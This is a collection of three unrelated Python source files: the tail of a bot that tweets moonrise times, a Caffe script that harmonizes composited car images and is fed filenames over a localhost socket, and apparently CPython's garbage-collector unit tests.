self.LOGGER.info("Now is not within the threshold before moonrise")
self._sleep(moonrise_current)
continue
self._tweetLunarTime(lunar_time_current)
self._saveLunarTime(lunar_time_current)
self._sleep(moonrise_current)
def _setup(self):
# Data Directory
self._data_dir = initDataDir(self._TASK_NAME)
# Latitude
latitude_str = getEnvVar(EnvVarName.LATITUDE)
if isEmpty(latitude_str):
raise RuntimeError("Missing required environment variable: " + EnvVarName.LATITUDE.name)
self._latitude_dms = decToDegMinSec(float(latitude_str))
self.LOGGER.debug("Latitude = " + ','.join(map(str, self._latitude_dms)))
# Longitude
longitude_str = getEnvVar(EnvVarName.LONGITUDE)
if isEmpty(longitude_str):
raise RuntimeError("Missing required environment variable: " + EnvVarName.LONGITUDE.name)
self._longitude_dms = decToDegMinSec(float(longitude_str))
self.LOGGER.debug("Longitude = " + ','.join(map(str, self._longitude_dms)))
# Location
self._location_str = getEnvVar(EnvVarName.LOCATION)
if isEmpty(self._location_str):
raise RuntimeError("Missing required environment variable: " + EnvVarName.LOCATION.name)
self.LOGGER.debug("Location = " + self._location_str)
# Timezone
self._timezone_str = getEnvVar(EnvVarName.TIMEZONE)
if isEmpty(self._timezone_str):
raise RuntimeError("Missing required environment variable: " + EnvVarName.TIMEZONE.name)
self._tzone = timezone(self._timezone_str)
self.LOGGER.debug("Timezone = " + self._timezone_str)
def _getLunarTimeCurrent(self) -> Dict:
lunar_time_now = self._getLunarTime(self.now, True)
if (lunar_time_now["transit"] < self.now):
lunarTimeTomorrow = self._getLunarTimeTomorrow(self.now)
return self._getLunarTime(lunarTimeTomorrow["transit"], True)
return self._getLunarTime(lunar_time_now["transit"], True)
def _getLunarTime(self, asOf: datetime, doFinalCorrections: bool) -> Dict:
utcAsOf = utc.normalize(asOf)
utcAsOfTuple = (
utcAsOf.year,
utcAsOf.month,
utcAsOf.day,
utcAsOf.hour,
utcAsOf.minute,
utcAsOf.second
)
moon_info = MoonInfo(self._latitude_dms, self._longitude_dms)
moon_info.update(utcAsOfTuple)
moon_times = moon_info.rise_set_times(self._timezone_str)
return self._getLunarTimeFromMoonTimes(moon_times, asOf, moon_info.fractional_phase(), doFinalCorrections)
def _getLunarTimeFromMoonTimes(self,
moonTimes: list,
asOf: datetime,
fractPhase: float,
doFinalCorrections: bool) -> Dict:
lunarTimeDict = {
"asOf": asOf,
"rise": None,
"transit": None,
"fraction": fractPhase,
"set": None
}
for moonTime in moonTimes:
infoType = moonTime[0]
infoTuple = moonTime[1]
if (infoType == "rise" and type(infoTuple) is tuple):
lunarTimeDict["rise"] = tupleToDateTime(infoTuple, self._tzone)
if (infoType == "transit" and type(infoTuple) is tuple):
lunarTimeDict["transit"] = tupleToDateTime(infoTuple, self._tzone)
if (infoType == "set" and type(infoTuple) is tuple):
lunarTimeDict["set"] = tupleToDateTime(infoTuple, self._tzone)
# Fixes for lunar times that do not occur on the asOf date
if ((lunarTimeDict["rise"] is None)
or (lunarTimeDict["transit"] is None)
or (lunarTimeDict["set"] is None)):
tomorrowLunarTime = self._getLunarTimeTomorrow(asOf)
if (lunarTimeDict["rise"] is None):
lunarTimeDict["rise"] = tomorrowLunarTime["rise"]
if (lunarTimeDict["transit"] is None):
lunarTimeDict["transit"] = tomorrowLunarTime["transit"]
if (lunarTimeDict["set"] is None):
lunarTimeDict["set"] = tomorrowLunarTime["set"]
# Final corrections (only is prescribed)
if (doFinalCorrections):
if (lunarTimeDict["rise"] > lunarTimeDict["transit"]):
yesterdayLunarTime = self._getLunarTimeYesterday(asOf)
lunarTimeDict["rise"] = yesterdayLunarTime["rise"]
if (lunarTimeDict["set"] < lunarTimeDict["transit"]):
tomorrowLunarTime = self._getLunarTimeTomorrow(asOf)
lunarTimeDict["set"] = tomorrowLunarTime["set"]
return lunarTimeDict
def _getLunarTimeYesterday(self, asOfToday: datetime) -> Dict:
yesterdayDate = asOfToday.date() - timedelta(days=1)
yesterdayDateTime = self._tzone.localize(datetime.combine(yesterdayDate, time(23,59,59)))
return self._getLunarTime(yesterdayDateTime, False)
def _getLunarTimeTomorrow(self, asOfToday: datetime) -> Dict:
tomorrowDate = asOfToday.date() + timedelta(days=1)
tomorrowDateTime = self._tzone.localize(datetime.combine(tomorrowDate, time()))
return self._getLunarTime(tomorrowDateTime, False)
def _tweetLunarTime(self, lunar_time) -> None:
message = self._MESSAGE_TEMPLATE.format(
self._location_str,
str(round(100 * lunar_time["fraction"])),
lunar_time["rise"].strftime(self._TIME_FORMAT),
lunar_time["set"].strftime(self._TIME_FORMAT)
)
self.LOGGER.info("A message will be tweeted!")
self.LOGGER.info(message)
TwitterUtil.tweet(message)
def _sleep(self, moonrise: datetime) -> None:
seconds_until_moonrise = (moonrise - self.now).total_seconds()
if (seconds_until_moonrise > self._THRESHOLD_SECONDS):
self.LOGGER.info("Sleeping until later this time")
sleep_seconds = seconds_until_moonrise - self._THRESHOLD_SECONDS
else:
self.LOGGER.info("Sleeping until next time")
next_lunar = moonrise + timedelta(days=1)
lunar_time_next = self._getLunarTime(next_lunar, False)
moonrise_next = lunar_time_next["rise"]
seconds_until_moonrise_next = (moonrise_next - self.now).total_seconds()
sleep_seconds = seconds_until_moonrise_next - self._THRESHOLD_SECONDS
self.LOGGER.info("Sleep for {:.0f} seconds".format(sleep_seconds))
sleep(sleep_seconds)
def _loadLunarTime(self) -> Dict:
filePath = Path(self._data_dir + self._TASK_NAME + DATA_FILE_EXT)
filePath.touch(exist_ok=True)
with open(filePath, 'r') as fp:
try:
# TODO: convert datetime string into datetime object
lunar_time = json.load(fp)
return lunar_time
except:
return None
def _saveLunarTime(self, lunar_time: Dict) -> None:
fw = open(self._data_dir + self._TASK_NAME + DATA_FILE_EXT, 'w+')
json.dump(lunar_time, fw, default=self._dumpConverter, indent=2)
fw.close()
def _dumpConverter(self, o):
if isinstance(o, datetime):
return o.__str__()
|
DIH_fast.py | #!/usr/bin/env python
import sys
sys.path.append('/root/caffe/python')
import caffe
import numpy as np
from PIL import Image
import os
import time
import cv2
import numpy as np
import scipy as sp
import scipy.ndimage
import socket
import socketserver # socketserver in Python 3+
import time
from queue import Queue
from threading import Thread
# class for handling requests
class QueueHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.server = server
server.client_address = client_address
socketserver.BaseRequestHandler.__init__(self,request, client_address, server)
# receive a block of datas
# put it in a Queue instance
# send back the block of data (redundant)
def handle(self):
data = self.request.recv(4096)
self.server.recv_q.put(data)
self.request.send(data)
# define the TCP server
class TCPServer(socketserver.TCPServer):
def __init__(self, ip, port, handler_class=QueueHandler):
socketserver.TCPServer.__init__(self, (ip, port), handler_class, bind_and_activate=False)
self.recv_q = Queue() # a Queue for data received over the socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_bind()
self.server_activate()
def shutdown(self):
socketserver.TCPServer.shutdown(self)
def __del__(self):
self.server_close()
class DIH_main(object):
def __init__(self):
self.value = 1
# create and instance of the server attached to some port
self.server = TCPServer("localhost",9999)
# start it listening in a separate control thread
self.server_thread = Thread(target=self.server.serve_forever)
self.server_thread.start()
self.stop = False
# result folder
folder_name = 'DIH_output/'
if os.path.isdir(folder_name):
pass
else:
os.makedirs(folder_name)
# set up caffe
caffe.set_device(0)
caffe.set_mode_gpu()
# load net
self.net = caffe.Net('../models/deploy_512.prototxt',
'../models/harmonize_iter_200000.caffemodel', caffe.TEST)
def add_one_to_value(self):
self.value += 1
#crop the image: allowed values for center: 256, 621, 986
def crop_image(self, image,center):
car_cropped = image[0:375,center-256:center+256,:]
car_padded = cv2.copyMakeBorder( car_cropped, 137, 0, 0, 0, cv2.BORDER_CONSTANT)
return car_padded
# takes a cropped image and a background, pastes the cropped image onto the backgroud based with the center at <center> pixels from the left
def restore_image(self, im_cropped,im_original,center):
car_depadded = im_cropped[137:512,0:512]
im_original[0:375,center-256:center+256,:] = car_depadded
return im_original
# creates a binary mask from the <car> object
def create_mask(self, car):
im_in = cv2.cvtColor(car,cv2.COLOR_RGB2GRAY)
# Threshold.
# Set values equal to or above 0 to 0.
# Set values below 0 to 255.
th, im_th = cv2.threshold(im_in, 0, 255, cv2.THRESH_BINARY)
filled = sp.ndimage.binary_fill_holes(im_th).astype(int)
mask = filled*255
mask = mask.astype('uint8')
return mask
# uses mask to paste a car object onto a background
def create_composite(self, car,mask,background):
color_mask = cv2.cvtColor(mask,cv2.COLOR_GRAY2RGB)
background = cv2.subtract(background,color_mask)
composite = cv2.add(background,car)
return composite
# harmonizes the <composite> with <mask> using DIH
def harmonize(self,composite,mask):
size = (512, 512)
# switch to BGR, subtract mean, and make dims C x H x W for Caffe
im = cv2.resize(composite,size, interpolation = cv2.INTER_CUBIC)
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
im = im.astype('float32')
if im.shape[2] == 4:
im = im[:, :, 0:3]
im = im[:, :, ::-1]
im -= np.array((104.00699, 116.66877, 122.67892))
im = im.transpose((2, 0, 1))
mask = cv2.resize(mask,size, interpolation = cv2.INTER_CUBIC)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2RGB)
mask = mask.astype('float32')
if len(mask.shape) == 3:
mask = mask[:, :, 0]
mask -= 128.0
mask = mask[np.newaxis, ...]
# shape for input (data blob is N x C x H x W), set data
self.net.blobs['data'].reshape(1, *im.shape)
self.net.blobs['data'].data[...] = im
self.net.blobs['mask'].reshape(1, *mask.shape)
self.net.blobs['mask'].data[...] = mask
# run net for prediction
self.net.forward()
out = self.net.blobs['output-h'].data[0]
out = out.transpose((1, 2, 0))
out += np.array((104.00699, 116.66877, 122.67892))
out = out[:, :, ::-1]
neg_idx = out < 0.0
out[neg_idx] = 0.0
pos_idx = out > 255.0
out[pos_idx] = 255.0
# Get result
result = out.astype(np.uint8)
# Convert RGB to BGR and put in desired shape
result = result[:, :, ::-1].copy()
return result
def run(self):
while not self.stop:
print ("Value =",self.value)
# if there is stuff in the queue...
while not self.server.recv_q.empty():
# read and parse the filename from the queue
filename = self.server.recv_q.get()
filename = filename.decode()
print(filename)
# load the car and background image
car_image = cv2.imread(filename)
cam_im_path = 'original/' + filename.split('/')[2]
camera_image = cv2.imread(cam_im_path)
# split the images in 3 separate 512x512 images since this is the input size of DIH
car1 = self.crop_image(car_image, 256)
car2 = self.crop_image(car_image, 621)
car3 = self.crop_image(car_image, 986)
bg1 = self.crop_image(camera_image, 256)
bg2 = self.crop_image(camera_image, 621)
bg3 = self.crop_image(camera_image, 986)
# create masks for each image
mask1 = self.create_mask(car1)
mask2 = self.create_mask(car2)
mask3 = self.create_mask(car3)
# create the composite for each image
composite1 = self.create_composite(car1, mask1, bg1)
composite2 = self.create_composite(car2, mask2, bg2)
composite3 = self.create_composite(car3, mask3, bg3)
# harmonize the composites
DIH_result1 = self.harmonize(composite1, mask1)
DIH_result2 = self.harmonize(composite2, mask2)
DIH_result3 = self.harmonize(composite3, mask3)
# concatenate the 3 images back to 1242x375
total_result = self.restore_image(DIH_result1, camera_image, 256)
total_result = self.restore_image(DIH_result2, total_result, 621)
total_result = self.restore_image(DIH_result3, total_result, 986)
# save the result
cv2.imwrite('DIH_output/fastmode/' + filename.split('/')[2], total_result)
# # perform some action based on the message
# if filename == "shutdown":
# self.server.shutdown()
# self.stop = True
time.sleep(1)
if __name__ == "__main__":
#main()
x = DIH_main()
x.run() |
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr, cpython_only, start_threads,
temp_dir, requires_type_collecting, TESTFN, unlink)
from test.support.script_helper import assert_python_ok, make_script
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@requires_type_collecting
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
@cpython_only
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
@requires_type_collecting
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
